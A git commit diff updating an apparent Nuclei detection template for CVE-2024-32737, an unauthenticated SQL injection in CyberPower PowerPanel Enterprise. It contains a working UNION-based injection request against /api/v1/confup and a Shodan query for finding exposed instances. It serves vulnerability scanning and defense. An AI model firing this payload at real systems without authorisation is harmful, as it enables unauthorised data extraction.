Update CVE-2024-32737.yaml
parent
10d2193b60
commit
a03a1ea8d1
|
@ -1,16 +1,17 @@
|
||||||
id: CVE-2024-32737
|
id: CVE-2024-32737
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: CyberPower - SQL Injection in MCUDBHelper (Contract Result Query)
|
name: CyberPower - SQL Injection
|
||||||
author: DhiyaneshDk
|
author: DhiyaneshDk
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.
|
A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.
|
||||||
impact: |
|
impact: |
|
||||||
An unauthenticated remote attacker can leak sensitive information via the "query_contract_result" function within MCUDBHelper.
|
An unauthenticated remote attacker can leak sensitive information via the "query_contract_result" function within MCUDBHelper.
|
||||||
reference:
|
reference:
|
||||||
- https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote
|
- https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote
|
||||||
- https://www.tenable.com/security/research/tra-2024-14
|
- https://www.tenable.com/security/research/tra-2024-14
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-32737
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
@ -21,13 +22,13 @@ info:
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
max-request: 1
|
max-request: 1
|
||||||
|
shodan-query: html:"<title>PDNU</title>"
|
||||||
tags: cve,cve2024,cyberpower,sqli
|
tags: cve,cve2024,cyberpower,sqli
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- method: GET
|
||||||
- |
|
path:
|
||||||
GET /api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1
|
- "{{BaseURL}}/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--"
|
||||||
Host: {{Hostname}}
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -51,4 +52,4 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '"modifiedtime":(["0-9.]+)"'
|
- '"modifiedtime":"([0-9.]+)"'
|
||||||
|
|
Loading…
Reference in New Issue